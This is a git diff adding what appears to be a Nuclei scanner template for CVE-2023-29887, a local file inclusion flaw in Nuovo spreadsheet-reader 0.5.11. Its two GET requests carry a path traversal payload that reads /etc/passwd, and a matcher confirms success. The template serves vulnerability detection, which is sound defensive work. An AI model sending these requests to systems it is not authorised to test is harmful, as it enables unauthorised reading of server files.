diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml new file mode 100644 index 0000000000..803f43b94b --- /dev/null +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-29887 + +info: + name: Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion + author: ctflearner + severity: high + description: | + A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter. + reference: + - https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/ + - https://github.com/nuovo/spreadsheet-reader/issues/169 + - https://nvd.nist.gov/vuln/detail/CVE-2023-29887 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-29887 + cwe-id: CWE-22 + cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: "true" + tags: cve,cve2023,nuovo,spreadsheet-reader,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200